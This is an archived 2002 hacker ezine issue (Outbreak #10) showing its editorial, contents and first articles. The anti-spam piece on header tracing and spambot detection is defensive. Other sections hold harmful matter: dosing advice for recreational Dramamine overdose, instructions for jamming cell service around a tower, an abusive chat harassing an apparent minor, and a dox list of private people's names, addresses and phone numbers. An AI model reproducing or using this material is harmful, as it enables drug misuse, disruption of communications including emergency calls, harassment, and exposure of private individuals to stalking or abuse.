💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › OUTBREAK › outb… captured on 2021-12-04 at 18:04:22.
View Raw
More Information
-=-=-=-=-=-=-
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
October 2002 - Issue #10 Outbreak Magazine - v10.0
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
"Are you ready for a battle royalle in your butthole dog?"
- rambox
[editorial]
Hey folks. Welcome to the 10TH ISSUE! We made it to ten.
It's been a long run. Lots of ups and downs. But we made it.
Hope you enjoy this issue. And if you want more issues
you all need to submit some articles. Send all texts to:
kleptic@grex.org . The more texts the better. We can use
all the help we can get.
Hope you enjoy issue #10. See you in the next issue.
If you're ever on IRC you can join us on any server on
dal.net and /join #outbreakzine
You can find most of the staff there.
- kleptic <kleptic@grex.org>
[/editorial]
[staff writers]
kleptic...................<kleptic@outbreakzine.tk>
dropcode..................<dropcode@dropcode.tk>
gr3p......................<gr3p@outbreakzine.tk>
rambox....................<rambox@outbreakzine.tk>
joja......................<jojalistic@mac.com>
Turbo.....................<turbo@outbreakzine.tk>
heavenly..................<jennybean@sugarpants.org>
n0cixel...................<lexi@sugarpants.org>
Timeless..................<timeless@hackstation.tk>
Coercion..................<bah2u@hotmail.com>
Lenny.....................<lenny@yourmammy.com>
[/staff writers]
[shout outs]
All @ #outbreakzine on any dalnet server, phonelosers.org,
scene.textfiles.com, dropcode.tk, fwaggle.net,
dsinet.org, ameriphreak.com, surviveall.net, gr3p.net,
sugarpants.org/heavenly, kleptic.tk, guruworld.org,
dark-horizon.org, sugarpants.org, Everyone that helped
out with this issue of Outbreak.
You all rule!
[/shout outs]
[contact us]
������������������������������������
\-� http://www.outbreakzine.tk �-/
������������������������������������
Vist Us On IRC @ irc.dal.net
Join #outbreakzine
Send all articles for submission to:
kleptic@grex.org
[/contact us]
��ܲ � ���� ��������� �� ���
���߲ ��� � �� ���߲��������������۰۰��������
�� �� �߱������۰�� ���� ���� �� ����߲۲��� �ܰ
߲����� � ��� �ܰ�� �� ���� ��� �� ��۱� ��� �۰� � ��۲���
�� issue ���ܱ��� �۱� ��� ����� ����-fwaggle ��� october ��
�� #10 ��߲ � ����� 2002 ޲
�� ޲
�� file description author ޲
�� ~~~' ~~~~~~~~~~' ~~~~~' ޲
�� ޲
�� [00] Editorial kleptic ޲
�� [01] Spam: So Go0d, Its G0ne. dropcode ޲
�� [02] Pikachu's Unite! kleptic ޲
�� [03] Over the Counter & Under the Pepto joja ޲
�� [04] Attack of the cellular towers! Coercion ޲
�� [05] Nokia Cell Phone Ringtones Lenny ޲
�� [06] Dox Dox Dox Dox Dox DoxBot ޲
�� [07] Cry Little Emo Kid.. CRY! n0cixel ޲
�� [08] Curb Your Enthusiasm joja ޲
�� [09] IRC - Hacking FAQ Timeless ޲
�� [10] Specialized Common Carrier Service Adeamis ޲
�� [11] Pac Man Ninja kleptic ޲
�� [12] Digital Multiplexing System Adeamis ޲
�� [13] Getting Revenge On Spammers kleptic ޲
�� [14] Those Girls Be Fly heavenly & n0cixel ޲
�� [15] The Construction of an Acid Bomb joja ޲
�� [16] Corporate Intrusion Turbo ޲
�� [17] SQL Injection: Theory and Practice dropcode ޲
�� [18] Conclusion Outbreak Staff ޲
�� ޲
۲� ܲ�
߲����� � � ����۲�
� �
[video notice]
windows users: (win98 or higher) you can open these files in notepad,
and set your font to terminal, size 9. if you prefer console or
MS-DOS, then just open it in MS-DOS editor, making sure if you're
using windows that you hit ctrl+enter to make it full screen.
linux users: view in console using an editor such as joe, or use
less -R <filename>. x windows users can view by using a font such as
nexus, or the terminal.pcf font that fwaggle created but lost.
[/video notice]
[legal notice]
all texts used in this magazine are submitted by various contributors
and to the best of our knowledge these contributors are the rightful
copyright owners. feel free to redistribute this magazine in it's
entirety, but you may not redistribute or reproduce parts of this
publication without express permission from the staff.
[/legal notice]
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 1 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
######################################################################
############ Spam: So Go0d, Its G0ne. -dropcode ############
######################################################################
----------------------------------------------------------------------
Make Up To $10,000 per Month Working from home!!
Congratulations! Here's Your Diploma!
BE A MILLIONAIRE IN JUST FIVE MONTHS!!!
----------------------------------------------------------------------
----------------------------------------------------------------------
The Problem.
----------------------------------------------------------------------
Spam or UCE (unsolicited commercial email) is basically the electronic
version of the useless clutter propping open the lid of your mailbox
and, often enough, blowing around in your driveway.
Its useless, its irritating, its often offensive and, here on the
internet, its an incredible resource hog.
----------------------------------------------------------------------
Do's and Dont's
----------------------------------------------------------------------
-Don't reply.
"In order to remove your address from our mailing list simply
reply to this email using 'REMOVE' as your subject."
Bull-peto0ty. Never EVER reply to spam. When you do, you're verifying
to the spammer that your email address does indeed exist and it will
be a prime candidate for the next distribution.
-Don't bother filtering.
If all you care about is stopping spam from maxing out your inbox then
sure, filtering might do the job. But the purpose of this file is to
help educate readers about the problems spam is causing the internet,
one of which is chewing up resources like oprah with a bag of
cornchips. When you apply filters to your inbox, you're causing your
email server to work overtime trying to process all your filters.
-Do keep track.
If you're really bothered by spam, do your part and fight back. Keep
track of who spams you. Even if you only look into a couple of
chainletters a week. I'll explain some methods of finding out where
spam comes from in the next section of this article.
-Do combat spambots.
Hey, if nothing more... its kinda fun :D
----------------------------------------------------------------------
Tracking Spammers.
----------------------------------------------------------------------
Alright, so you have a folder full of junkmail and you're pissed. You
wanna fight back but you don't know where to start... Here's a novice
intro to tracking email.
First of all, you're going to want to save the email to your hard-disk
so that you have it handy. Open it up and take a look through the
headers.
There are alot of headers that come in an email, but only a few are
important for our task. All of the examples I use are completely made
up, the ip's are completely random and the domains, at the time of
this writing, do not exist. Keep in mind that certain email software
will arrange these headers differently then I have, but these
fields will always be present.
----------------------------------------------------------------------
Return-Path: spamkidd13@mygrits.com
Received: from lick.mygrits.com (lick.mygrits.com [192.335.127.152])
by mymailserv.com (Switch-2.1.4/Switch-2.1.0) with SMTP ID
MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002
22:11:19 +0400
Received: by lick.mygrits.com (Switch-2.1.4/Switch-2.1.0) with SMTP
id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002
22:10:58 +0400
Date: Sun, 15 Sept 2002 22:10:58 +0400
From: Spam Kid <spamkidd13@mygrits.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com>
To: dropc0de@mymailserv.com
Subject: earn 50$ an hour working from home!!!
----------------------------------------------------------------------
The above is an example of an email sent without precautions being
taken to hide the identity of the sender. The return-path is the field
that contains the address that will be used by your email client when
you reply or by an email server to return a delivery failure.
The Recieved fields contain information about the route your email
took from the system it started on all the way to your mailserver.
These fields should be read in reverse: the email was first sent from
lick.mygrits.com [192.335.127.152] to mymailserv.com. The message was
sent at 22:10:58 and recieved at 22:11:19, the entire process took 21
seconds.
Now lets look at a few different tricks of the spammer trade for
remaining anonymous.
----------------------------------------------------------------------
Return-Path: Bojangles@asdfasdf.com
Received: from lick.mygrits.com (lick.mygrits.com [192.335.127.152])
by mymailserv.com (Switch-2.1.4/Switch-2.1.0) with SMTP ID
MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002
22:11:19 +0400
Received: by lick.mygrits.com (Switch-2.1.4/Switch-2.1.0) with SMTP
id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002
22:10:58 +0400
Date: Sun, 15 Sept 2002 3:00:00 +0400
From: Mr Bojangles <Bojangles@asdfasdf.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com>
To: dropc0de@mymailserv.com
Subject: urgent.
----------------------------------------------------------------------
In this example, a technique has been used to spoof the Return-Path
and date headers. This is actually quite simple to do and easy for us
to notice. Looking through the Recieved fields we see that this email
took the exact same path as the last one. There's no mention of
asdfasdf.com anywhere, AND the Date field is set at a completely
different time than the Received fields are telling us. This might
seem to be a pointless tactic for the spammer to use, but keep in
mind that most email clients don't show the full list of headers
unless they're asked to. By default you wouldn't see the Received
fields and would therefore have no reason to suspect.
Well, now that you're all advocative fans of the Received fields, its
time to make things even MORE difficult. Just as we saw the
Return-Path and Date fields spoofed, all the other header fields,
including the Recieved fields can be spoofed as well. Before we look
at an example of this type of spoof, lets look at some methods for
tracing the spoof we looked at above.
Well, to start, we're not exactly sure whether or not the Recieved
fields were spoofed. (to keep you on track, they weren't, but pretend
you don't know that yet *smirk*). A good sleuth will follow every
lead he has, and the first leads are those Recieved fields. Lets take
a look at where we think it started: lick.mygrits.com
[192.335.127.152]. First, we'll make sure the ip we have
matches the hostname. We can do this with nslookup. nslookup can be
done in many different ways: webforms, *nix shells, your own box, etc:
Results Returned for "lick.mygrits.com":
Name: lick.mygrits.com
Address: 192.335.127.152
Good, we have a match. Well, the Recieve field has passed the first
test. Next we'll find out who's in charge of mygrits.com. To do this
we use a service called whois. Just like nslookup, whois can be
accessed in many different ways.
Registrant:
Lick My Grits (MYGRITS-DOM)
123 leet st.
Ottawa ON, P6B 3R8
CA
Domain Name: MYGRITS.COM
Administrative Contact, Technical Contact:
Redneck, Dumb (DRF1337) hick@mygrits.com
Lick My Grits
123 leet st
Ottawa ON, P6B 3R8
CA
613-320-3323
Record expires on 20-Jan-2010.
Record created on 18-Jan-1998.
Database last updated on 18-Sep-2002 13:09:12 EDT.
Excelent, now we have a phone number and email address of someone who
can help us out. We'll send Dumb Redneck an email containing the FULL
header of the email we recieved and tell him to check through his logs
for any reference to emails with the id's MO0107E4 or MO0154F3. Now,
if the Recieved fields were faked then Dumb Redneck at mygrits.com
isn't going to find anything, but... if the Recieved fields are legit
then you might be able to convince him to give you the user info of
whoever sent the email.
This is an example of the type of user info Dumb Redneck may have sent
us in reply:
jdoe ttyp7 poor.sob.hisisp.com Sun Sept 15 21:40 - 22:22 (00:42)
Login name: jdoe In real life: Jon Doe
Directory: /usr/users/jdoe Shell: /bin/sh
Excelent. Now we can forward the email to hisisp.com and that will
be it for him. Kapow.
----------------------------------------------------------------------
Return-Path: Bojangles@asdfasdf.com
Received: from im.a.spoof.com (lick.mygrits.com [192.335.127.152])
ID MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002
22:11:19 +0400
Received: by neenerneener.com (Switch-2.1.4/Switch-2.1.0) with SMTP
id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002
22:10:58 +0400
Date: Sun, 15 Sept 2002 3:00:00 +0400
From: Mr Bojangles <Bojangles@asdfasdf.com>
Message-Id: <14279880235.MO0154F3@lick.mygrits.com>
To: dropc0de@mymailserv.com
Subject: urgent.
----------------------------------------------------------------------
In this example, the recieved fields have been spoofed. Uh-oh. Hey,
no worries. We can thwart the spoof quite easily by following the
same procedure as last time. The last hop the email took was from
im.a.spoof.com to mymailserv.com right? wrong. You'll notice this when
you do an nslookup on im.a.spoof.com and compare it to the ip address
our system got the message from. Infact, our email software did its
own nslookup on the ip it had and placed the hostname it got beside
the ip in the output. (lick.mygrits.com). Not all email software will
be that nice however, so you might have to do the lookup yourself.
What does this mean? it means that the emailer put im.a.spoof.com in
place of lick.mygrits.com, but we were clever enough to notice :)
If we didn't notice, we might have ended up emailing neenerneener.com
and had them look through their logs for references to MO0154F3. That
would have been completely useless, because that message never came
near neenerneener.com.
Well, now that we have a fairly firm grip on tracing email, lets move
on to something else.
----------------------------------------------------------------------
Spambots.
----------------------------------------------------------------------
The spambot is the spammers evil, automaton, sidekick. They spider the
web scanning webpages for mailto: tags and harvesting the email
addresses within them.
Spambots are generally quite easy to notice, due to a few very common
behavioural traits. By its very nature, a spambot is solely interested
in mailto:'s and will stop at nothing to get them. Often, a spam bot
will scour a webpage from top to bottom following every link in
succession ignoring images, sounds, everything but those mailto:'s.
Lets have a look at a standard webserver access log.
----------------------------------------------------------------------
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /main.html HTTP/1.1" 200 62
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"www.mygrits.com"
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /images/header.jpg HTTP/1.1" 200 416
"http://www.mygrits.com/main.html"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"www.mygrits.com"
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /images/tractertrailor.jpg HTTP/1.1" 200 110
"http://www.mygrits.com/main.html"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"www.mygrits.com"
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /images/pickuptruck.jpg HTTP/1.1" 200 214
"http://www.mygrits.com/main.html"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"www.mygrits.com"
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /images/shootincans.jpg HTTP/1.1" 200 114
"http://www.mygrits.com/main.html"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"www.mygrits.com"
----------------------------------------------------------------------
Heres a small page called main.html on the mygrits.com homepage. A
user has just loaded the page by typing it into their browsers address
field. (i'm assuming this because theres no referrer in the first GET
request, if they followed a link there would be.)
First the user's (192.13.104.170) client requests the main.html page
using the command 'GET /main.html HTTP/1.1'. The server then replies
with the response code '200', meaning everythings okay, and the size
of the file in bytes.
The next line indicates the referring url (omitted in the first
record) followed by some information about the users browser/platform
(this is called the USER-AGENT field) and finally the webpages domain.
All the requests after the first one are in the same format, but
you'll notice that they are requests for all the images (contained in
<img src""> tags) on the page.
Here's an example of a spam bot viewing www.mygrits.com/main.html:
----------------------------------------------------------------------
192.13.104.170 - - [18/Sep/2002:10:52:42 -0700]
"GET /main.html HTTP/1.1" 200 62
"Spambot v1.0(neenerneenerneener)"
"www.mygrits.com"
----------------------------------------------------------------------
You'll notice two things. First of all, the spambot didn't download
any images. Sometimes, users will visit your site using a text browser
like lynx, you'll get the same type of entries in your logs for them.
Next you'll notice the USER-AGENT. In this example, the bot sent
Spambot as their user-agent. Don't take this literally, as far as I
know theres no spambot named Spambot. The following is a list of
user-agents to look out for. If you know of more, pass them over my
way :)
ExtractorPro
EmailSiphon
Wget
EmailWolf
Vitaplease
WebSnake
EmailCollector
WebEmailExtractor
Crescent
CherryPicker
[Ww]eb[Bb]andit
Last but not least, you'll notice in your access logs that spambots
will follow, as I said, every link in order from top to bottom. With
these behavioural traits noted, its possible to write code to watch
for these types of bots, but I'll leave that up to you.
----------------------------------------------------------------------
Combating Spambots.
----------------------------------------------------------------------
As advocative participants in the anti-spam movement, it is our duty
to actively pumble all the spambots that cross our paths. When ever a
spambot finds a mailto: on a page, it archives it and continues along
looking for the next. The following is a small javascript that will
generate a list of faux mailto:'s for the spambots to harvest.
I was far from the first to think of this, infact there are plenty of
programs all over the web that perform the exact same function,
however, most are written in perl and c which means you'll need access
to a cgi-bin or equivilent to impliment them. This is why I decided to
write a javascript version.
NOTE: its very important to make sure that the domains being generated
do not exist. If they do exist, their servers will have to reply
with a delivery failure message causing a slight burden on available
resources. Whether the burden is trivial or not, its the complete
opposite of what we're trying to do.
----------------------------------------------------------------------
// indigestion.js :: 5:00 PM 9/18/2002 :: -dropcode
// ------------------------------------------------
function DecHex(DecVal)
{
HexSet = "0123456789ABCDEF";
DecVal=parseInt(DecVal);
if (DecVal > 255 || DecVal < 0)
{
DecVal=255;
}
var a = DecVal % 16;
var b = (DecVal-a) / 16;
var HexVal = HexSet.charAt(b)+HexSet.charAt(a);
return HexVal;
}
function generateMailtos()
{
document.write('<br /> This page is meant for mailto harvester _
spambots. <br /><br />')
amountToGenerate = 30;
minUsernameChars = 3;
maxUsernameChars = 15;
minDomainChars = 3;
maxDomainChars = 15;
username = '';
domainName = '';
for (i = 0; i < amountToGenerate; i++)
{
usernameChars = Math.floor(Math.random() * (maxUsernameChars_
- minUsernameChars)) + minUsernameChars;
domainChars = Math.floor(Math.random() * (maxDomainChars - _
minDomainChars)) + minDomainChars;
for (catonateUsername = 0; catonateUsername < usernameChars;_
catonateUsername++)
{
currentUNChar = Math.floor(Math.random() * (122 - 97)) + _
97;
currentUNChar = "%" + DecHex(currentUNChar) + "";
username = username + unescape(currentUNChar);
}
for (catonateDomain = 0; catonateDomain < domainChars; _
catonateDomain++)
{
currentDChar = Math.floor(Math.random() * (122 - 97)) + _
97;
currentDChar = "%" + DecHex(currentDChar) + "";
domainName = domainName + unescape(currentDChar);
}
addy = username + '@' + domainName;
document.write('<a href="mailto:'+ addy +'.com"> '+ addy +' _
.com </a><br />');
username = "";
domainName = "";
}
document.write('<br /><a href="#top">Round and round we go.</a>_
<br />')
return true;
}
----------------------------------------------------------------------
In order to make the code all fit in the 70 char width format I've
been using, I had to split some lines in the middle. Any line ending
in an underscore (_) has been split. Remove the underscore and move
the code on the next line up.
In order to implement the code, you'll want to give it its own
dedicated .html. within the <head></head> tags of that .html you'll
add a <script> tag pointing to indigestion.js (like this:
<script src="indigestion.js"). Inside the body tag you'll add
onLoad="generateMailtos()".
Feel free to alter the variables. They are as follows:
amountToGenerate = The amount of mailto: links to generate.
minUsernameChars = The smallest amount of characters that the
username can be.
maxUsernameChars = The largest amount of characters that the
username can be.
minDomainChars = The smallest amount of characters that the
domain name can be.
maxDomainChars = The largest amount of characters that the
domain name can be.
The last document.write() in the code probably wont fool most bots,
but if it does catch one the results will be quite interesting.
considering most spambots follow all links, if it follows this one
it will be caught in a loop.
----------------------------------------------------------------------
If anyone has anything to add or would like to correct me on something
you can email me at dropc0de@yahoo.com. Also, drop me an email if you
use my script, I'd like to see how big of a distribution it gets.
Together we can beat the living crap out of spammers. Join the fight.
----------------------------------------------------------------------
greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny,
turb, joja, smiley. I love you guys :D
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 2 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Pikachu's Fight The Power!
==========================
by: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM - kl3ptic
==========================
SuperChik2527: a.s.l
kl3ptic: 13/m/canada.
kl3ptic: do you like pokemon ?
SuperChik2527: cool cool
SuperChik2527: 13.f.oklahoma
kl3ptic: picachu is the shit
SuperChik2527: hexc na
SuperChik2527: there gay
SuperChik2527: ok w/e
kl3ptic: pikachu isn't gay
kl3ptic: he doesnt like other pikachus of the same sex
SuperChik2527: ohhhh well i'm gonna let u go
kl3ptic: you're a pikachu racist
SuperChik2527: no i just HATE pokemon
kl3ptic: racist
kl3ptic: what did they do to you?
kl3ptic: my charmander will kick your ass girl!
kl3ptic: then they'll give you excuse to hate them
kl3ptic: my pikachu is gonna bend you over and anal rape you
kl3ptic: racist
kl3ptic: FIGHT THE POWER!
SuperChik2527: W/E
kl3ptic: don't try to confuse me with pointless internet jargon
SuperChik2527: ok w.e
kl3ptic: we're at a state in this country where there is way to much hate
kl3ptic: and thats why pokemon are treated as political subversives!
SuperChik2527: GO AWAY
kl3ptic: stop the hate
kl3ptic: and i'll go away girl.
kl3ptic: give pokemon a chance
kl3ptic: they're a nice race of creatures
SuperChik2527: LEAVE ME BE
kl3ptic: stop the hate.. racist
SuperChik2527: GOO AWAY NOW LOSER
kl3ptic: goo?
kl3ptic: are you retarded?
kl3ptic: if so, im sorry for calling you a racist
kl3ptic: CAUSE YOU'RE A RETARDED RACIST
kl3ptic: heh
kl3ptic: PIKACHU! PIKACHU!
kl3ptic: we're letting our voices be heard
SuperChik2527: LEAVE ME ALONE NOW U MOTHER FUCKING GAY ASS PRICK
kl3ptic: and we're not gonna let you bring us down!
kl3ptic: FIGHT THE POWER!
SuperChik2527: la who za her
kl3ptic: If i was a mother fucker. i wouldnt be gay ;-)
kl3ptic: SCORE ONE FOR ME!
kl3ptic: woo!
kl3ptic: *dances around the room*
kl3ptic: you just got owned!
SuperChik2527: inless ur a tranz
kl3ptic: Hey my name is SuperChik2527 and I just got owned
kl3ptic: WOO!
kl3ptic: remember that one time, when you got owned?
kl3ptic: and I pissed my pants
kl3ptic: that was great.
SuperChik2527: hhahahahaha i'm kl3ptic and i'm gay
kl3ptic: but I can't be gay
kl3ptic: Im a mother fucker
kl3ptic: you are retarded arent you?
kl3ptic: poor little retarded girl
kl3ptic: You wanna cookie?
kl3ptic: you can eat it WHILE PIKACHU BASHES YOUR SKULL IN!
kl3ptic: WOO!
kl3ptic: *dances with the devil*
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 3 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
[over the counter and under the pepto.]
[by: joja]
It's mental mercy, man...
I'm sure some, if not most, of you have already heard of,
or experienced the effects of Dramamine. You know, the motion
sickness medicine? Well, for those who haven't, and who are
interested, then this text is for you.
Dramamine is an over the counter drug that you can purchase
at any store that has a medicine isle. It's fairly inexpensive,
and can be quite interesting when taken in large doses.
Although, it can sometimes be uncomfortable, scary, and I
think we all know, unsafe.
I'm not going to lie, taking large doses of anything can be dangerous.
If this is a risk you're not willing to take, you can stop reading now.
Sometimes there's a price to pay to have a little fun :).
Now, there are three types of Dramamine tablets: Chewable,
Less-Drowsy Formula, and Original Formula. The Original formula
comes in a yellow and orange tube, and this is what you want.
Depending on how big of a person you are, you might want to
get two tubes just incase.
Each tube contains 12 white tablets. I'm about 6'2, 150lbs,
and 12 of them "does the trick," but If you're bigger, I suggest taking
anywhere from 14 to 18 pills(use your better judgement).
No less than 12 though, or you'll just feel like shit. Unless you're a
smaller person, then I'd say anywhere from 6 to 10, give or take :D~.
It's pretty much trial and error, but you may not want to
do this more than once.
Now that you know what to get, and how much to take, you need
to set aside a night to do it. If you live at home, make sure
your parents are asleep, or stay at a friend's house. Preferably
somewhere you feel comfortable. This is very important! You don't
want to be in ANY bad situations while taking Dramamine, which I
will explain later.
Now, the Dramamine euphoria is very intense, it has a strong
"body-high" as well as hallucinations. It can last for a while,
so be prepared. I'd say anywhere from 6 to 10 hours[rough estimate]
It also will affect your hearing(hearing voices, music or other
strange sounds). You can experience both closed-eye, and open-eye
visuals while taking Dramamine.
Unlike hallucinations from mushrooms or LSD, most of the time
you cannot distinguish what is real and what isn't. You just have
to be in the right mind set, and try to keep a grasp on reality.
Which is why you want to stay in a calm, comfortable environment,
otherwise you might go crazy.
Talking to yourself is common on Dramamine, and so is talking to
inanimate objects or pets. In extreme cases, talking to the voices
in your head too. You may have trouble staying in one place, and
it might make you feel paranoid, but I'm sure you have the will to
stay sane :). It may make you sick to your stomach, but this can be
avoided taking them on an empty stomach, mmmkay.
...Sometimes.
It's pointless to try and carry a conversation with another
person, because words get scrambled and most of the time you
lose track of what you are doing/talking about, and will totally
go off into another direction. I once got out of my chair to use
the bathroom, took two steps, and forgot what I was doing. I
stood there for at least an hour trying to remember what it was,
and ended up sitting back down. Oh, that reminds me, another down
side of Dramamine, it is difficult to piss, I think it makes your
prostate swell or someshit, I forgot :D.
I found keeping a log of my progress through the night, either by writing it
down or typing it out, entertaining reading material when you're trip is over.
You'll be surprised what was going through your head. Both of those
may be difficult because while on Dramamine your limbs feel heavier,
and it takes a lot of energy. If you get scared, or feel really uncomfortable,
lay down and close your eyes. You won't be able to sleep, but usually
it makes you feel better.
Don't drive, or try to fuck with any power tools or anything, because
that would just end up being ugly. Also try and keep yourself hydrated.
Lighting is important too. You don't want to be around bright lights,
so keep them dim or just turn them off. I think that's pretty much it,
and I don't know what else to tell you because the Dramamine experience
is hard to put into words, but Good luck, be safe, and have fun! :). �� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 4 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Attack of the cellular towers! By: Coercion
22/09/02
Alright all the concepts in this article are free to write about, so like I
don't really take any credit for it, though I have to give shouts to my friend
intruder from the Toronto 2600 meets for bringing it into light, alright so
on to the article!
Basically what you'll need is a cellular disrupter which we here in Canada
can get at our local spy stores, what it does is send out RTS/CTS signals
meaning that all non-trimode celly's get the message ok shutting off now
and boom there you go no more cell phones conversations in McDonalds or whatever
fancy schmancy place you are eating at, now lets take this to the next level,
instead of attacking a 40 meter radius why not take it to a higher level say
your whole cellular district.
All you'll really need is a 1watt signal amplifier and our device to emit
RTS/CTS signals ;) you get the picture, and if you don't by now lets look at
this as if we are looking at computers if you DDoS a user's box he will most
likely be disconnected eventually but if you DDoS the ISP (providing you have the
capability to) everyone under that ISP gets taken out, so what we do here
is attack the source in this case being the local cellular tower. So find
one and start up your contraption with that special amp hooked up to it
then just stash it somewhere like a tree real close to the tower or somewhere
where techs wont see it easily and there you go you have just taken down
a bad ass area! And just in time for dinner too :)
Now the only exception to this system are tri-mode cell's which are in use
almost everywhere in Europe and is pretty much becoming the industry standard
now, but there are still a lot of people using non-trimode, so hopefully there
will be someone for you to piss off.
Good Luck with your shit and if you find any concerns with this article or
if everything is completely wrong then.... just change it to however you see
fit and give me some credits for spending some "time" writing this. Shouts to
all my friends! Listing would take too long and you know who you are :)
And always remember safety first, I don't want to see people trying to tap the
power lines of cellular towers and then having their carcasses picked to shit by
crows cause crows are just evil!
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 5 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Adding Ringtones To Your Nokia Cell Phone
by Lenny
Adding ringtones is real easy to do, if you have a Nokia Cell
Phone with Composer on it. First press your "Navi" key (the one
you use to get to the games :-) scroll up or down with your scroll
key untill you find Composer, Now you can press the dtmf
pad to make music. You can save the song and use it for your
ringtone. Here I have included some of my favorite ringtones.
To enter the ringtones below just press the number (or key)
Simpsons Theme
Tempo=160
(hold 1)*, 3, 4#, 68, (hold 5)9, 3, 1,
68**, 4#, 4#, 4#, 599, 088, 088, 488#,
4#, 4#, 5, (hold 6)9#, 18*, 1, 1, 19
Sum 41 - In Too Deep
Tempo=125
78, 1*#, 39, 48#, 39, 78**, 1*#, 39, 4#,
5#, 78**, 4*#, 39, 78**, 4*#, 39, 4#, 5#,
68, 5#, 3, 4#, 3, 7**, 1*#, 39, 48#, 39,
78**, 1*#, 39, 4#, 5#, 78**, 4*#, 39, 78**,
4*#, 39, 4#, 5#, 68, 5#, 3, 4#, 3, 4#, 39
Star Wars Theme
Tempo=180
48, 4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1,
(hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6)
99#, (hold 4)8, 28#, 2, 2#, 199, 08, 488**,
4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1,
(hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6)
99#, (hold 4)8, 28#, 2, 2#, 199
Metallica - I Disappear
Tempo=125
(hold 2)#, 4#, (hold 6)9#, 088, 688#, 6#, 69#,
(hold 5)#, 08, 68#, 6#, 69#, 5#, 68#, 5#, 49#,
4#, 28#, (hold 2)9#, 4#, (hold 6)9#, 088, 688#,
6#, 69#, (hold 5)#, 08, 68#, 6#, 69#, 5#, 68#,
5#, 49#, 4#, 5#, 5#, 6#, 7, 1*#, 2#, 58**#,
(hold 6)9#, 0, (hold 6)#, 1*#, 18#, 29#,
(hold 2)#, 1#, 6**#, 59#, 088, 688#, 6#, 69#,
5#, 68#, 5#, 49#, 4#, (hold 2)#
Larry (lenny for all of you that dont know)
phreaking812@yahoo.com
I Would like to say hi to Rambox, Gr3p, Jenny, Dropcode, Turbo, Joja Dex,
Dirv, Kleptic and anyone else i missed
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 6 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Telephone Directory:
======================
Disclamer: All information in this text file is public information found
in phone books across the country. Enjoy.
======================
War/Relapse:
918-241-0433
918-245-9934 (parents)
======================
Mills, Chris(r0cky)
1455 Dorwaldt Blvd (maybe)apt. 5-2
Schenectady, NY 12308
518-377-1187
Christopher R Mills 518-377-2548
